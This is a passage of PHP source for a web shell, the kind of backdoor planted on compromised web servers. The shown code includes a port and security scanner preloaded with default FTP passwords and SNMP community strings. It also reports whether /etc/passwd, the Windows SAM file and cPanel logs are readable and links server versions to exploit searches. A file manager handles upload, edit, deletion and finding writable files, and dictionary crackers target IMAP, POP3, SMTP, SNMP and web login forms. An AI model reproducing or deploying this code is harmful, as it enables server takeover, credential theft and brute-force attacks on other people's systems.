name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>"; $host = substr($host,0,strrpos($host,".")); echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning <input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>"; } } function sysinfO(){ global $windows,$disablefunctions,$safemode; $cwd= getcwd(); $mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program="; $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"]; $osver=$tsize=$fsize=''; if ($windows){ $osver = " (".shelL("ver").")"; $sysroot = shelL("echo %systemroot%"); if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"]; if (empty($sysroot)) $sysroot = getenv("windir"); if (empty($sysroot)) $sysroot = "Not Found"; if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%"); for ($i=66;$i<=90;$i++){ $drive= chr($i).':\\'; if (is_dir($drive)){ $fsize+=@disk_free_space($drive); $tsize+=@disk_total_space($drive); } } }else{ $fsize=disk_free_space('/'); $tsize=disk_total_space('/'); } $disksize="Used spase: ". showsizE($tsize-$fsize) . " Free space: ". showsizE($fsize) . " Total space: ". showsizE($tsize); if (empty($CPU)) $CPU = "Unknow"; $os = php_unamE(); $osn=php_unamE('s'); if(!$windows){ $ker = php_unamE('r'); $o=($osn=="Linux")?"Linux+Kernel":$osn; $os = str_replace($osn,"${mil}$o\">$osn</a>",$os); $os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os); $inpa=':'; }else{ $sam = $sysroot."\\system32\\config\\SAM"; $inpa=';'; $os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os); } $software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']); echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>"; if ($windows){ echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>"; } else { echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">"; if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">"; if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found"; echo "</td></tr>"; } $uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR'); echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>"; } function checksuM($file){ global $et; echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et"; } function listdiR($cwd,$task){ $c= getcwd(); $dh = opendir($cwd); while ($cont=readdir($dh)){ if($cont=='.' || $cont=='..')continue; $adr = $cwd.DIRECTORY_SEPARATOR.$cont; switch ($task){ case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; case '2':if(is_file($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break; case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break; case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break; case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break; case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break; } if (is_dir($adr)) listdiR($adr,$_REQUEST['task']); } } if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}} if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}} function filemanager(){ global $windows,$msgbox,$errorbox,$t,$et,$hcwd; $cwd= getcwd(); $table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">"; $td1n="<td width=\"22%\" bgcolor=\"#666666\">"; $td2m="<td width=\"22%\" bgcolor=\"#808080\">"; $td1i="<td width=\"5%\" bgcolor=\"#666666\">"; $td2i="<td width=\"5%\" bgcolor=\"#808080\">"; $tdnr="<td width=\"22%\" bgcolor=\"#800000\">"; $tdw="<td width=\"22%\" bgcolor=\"#006E00\">"; if (!empty($_REQUEST['task'])){ if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7; if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6; echo "<font color=blue><pre>"; listdiR($cwd,$_REQUEST['task']); echo "</pre></font>"; }else{ if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){ if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){ $title="Destination"; $ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV']; $dis =(!empty($_REQUEST['cP']))?'Copy':'Move'; }else{ $ad = $_REQUEST['rN']; $title ="New name"; $dis = "Rename"; } if (!!empty($_REQUEST['deS'])){ echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>"; }else{ if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']); else{ copy($ad,$_REQUEST['deS']); if (!empty($_REQUEST['mV']))unlink($ad); } } } if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) { $dh = opendir($_REQUEST['deL']); $d=""; while ($cont=readdir($dh)){$d++;} if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}} if (!empty($_FILES['uploadfile'])){ move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']); echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>"; } $select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\""; if (!empty($_REQUEST['newf'])){ if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");} if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);} } if ($windows){ echo "$table<td><b>Drives:</b> "; for ($i=66;$i<=90;$i++){$drive= chr($i).':'; if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";} } echo $et; } echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>"; $file=array();$dir=array();$link=array(); if($dirhandle = opendir($cwd)){ while ($cont=readdir($dirhandle)){ if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont; elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont; else $link[]=$cont; } closedir($dirhandle); sort($file);sort($dir);sort($link); echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>"; $i=0; foreach($dir as $dn){ echo "<tr>"; $i++; $own="Unknow"; $owner=posix_getpwuid(fileowner($dn)); $mdate=date("Y/m/d H:i:s",filemtime($dn)); $adate=date("Y/m/d H:i:s",fileatime($dn)); $diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>"; if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2; echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">"; if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>"; echo $cl1."$own</td>"; echo $cl1."$mdate</td>"; echo $cl1."$adate</td>"; echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>"; echo "$cl1------</td>"; echo $cl2.$diraction; echo "</tr>" ; flusheR(); } foreach($file as $fn){ echo "<tr>"; $i++; $own = "Unknow"; $owner = posix_getpwuid(fileowner($fn)); $fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>"; $mdate = date("Y/m/d H:i:s",filemtime($fn)); $adate = date("Y/m/d H:i:s",fileatime($fn)); if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; $size = showsizE(filesize($fn)); if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2; echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">"; if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>"; echo $cl1."$own</td>"; echo $cl1."$mdate</td>"; echo $cl1."$adate</td>"; echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>"; echo "$cl1$size</td>"; echo $td2m.$fileaction; echo "</tr>" ; flusheR(); } foreach($link as $ln){ $own = "Unknow"; $i++; $owner = posix_getpwuid(fileowner($ln)); $linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>"; $mdate = date("Y/m/d H:i:s",filemtime($ln)); $adate = date("Y/m/d H:i:s",fileatime($ln)); if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>"; echo "<tr>"; $size = showsizE(filesize($ln)); if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2; echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">"; if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>"; echo $cl1."$own</td>"; echo $cl1."$mdate</td>"; echo $cl1."$adate</td>"; echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>"; echo "$cl1$size</td>"; echo $cl2.$linkaction; echo "</tr>" ; flusheR(); } } $dc = count($dir)-2; if($dc==-2)$dc=0; $fc = count($file); $lc = count($link); $total = $dc + $fc + $lc; echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b> Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et"; } } function imaplogiN($host,$username,$password){ $sock=fsockopen($host,143,$n,$s,5); $b=namE(); $l=strlen($b); if(!$sock)return -1; fread($sock,1024); fputs($sock,"$b LOGIN $username $password\r\n"); $res=fgets($sock,$l+4); if ($res == "$b OK")return 1;else return 0; fclose($sock); } function pop3logiN($server,$user,$pass){ $sock=fsockopen($server,110,$en,$es,5); if(!$sock)return -1; fread($sock,1024); fwrite($sock,"user $user\n"); $r=fgets($sock); if($r{0}=='-')return 0; fwrite($sock,"pass $pass\n"); $r=fgets($sock); fclose($sock); if($r{0}=='+')return 1; return 0; } function imapcrackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $imap=imaplogiN($target,$user,$pass); if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{ if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}} flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "<center>${t}IMAP cracker:$crack"; } function snmpcrackeR(){ global $t,$et,$errorbox,$crack,$hcwd; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); while(!feof($dictionary)){ $com=trim(fgets($dictionary)," \n\r"); $res=snmpchecK($target,$com,2); if($res)echo "$com<br>"; flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "<center>${t}SNMP cracker:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>"; } function pop3crackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $pop3=pop3logiN($target,$user,$pass); if($pop3==-1){echo "$errorbox Can not connect to server.$et";break;} else{ if ($pop3){echo "U: $user P: $pass<br>";if(!$type)break;}} flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "<center>${t}POP3 cracker:$crack"; } function smtpcrackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $smtp=smtplogiN($target,$user,$pass,5); if($smtp==-1){echo "$errorbox Can not connect to server.$et";break;} else{ if ($smtp){echo "U: $user P: $pass<br>";if(!$type)break;}} flusheR(); } echo "<br>Done</font>"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "<center>${t}SMTP cracker:$crack"; } function formcrackeR(){ global $errorbox,$footer,$et,$hcwd; if(!empty($_REQUEST['start'])){ $url=$_REQUEST['target']; $uf=$_REQUEST['userf']; $pf=$_REQUEST['passf']; $sf=$_REQUEST['submitf']; $sv=$_REQUEST['submitv']; $method=$_REQUEST['method']; $fail=$_REQUEST['fail']; $dic=$_REQUEST['dictionary']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer"); $dictionary=fopen($dic,'r'); echo "<font color=blue>Cracking started...<br>"; while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $url.="?$uf=$user&$pf=$pass&$sf=$sv"; $res=check_urL($url,$method,$fail,12); if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;} flusheR(); } fclose($dictionary); echo "Done!</font><br>"; } else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" 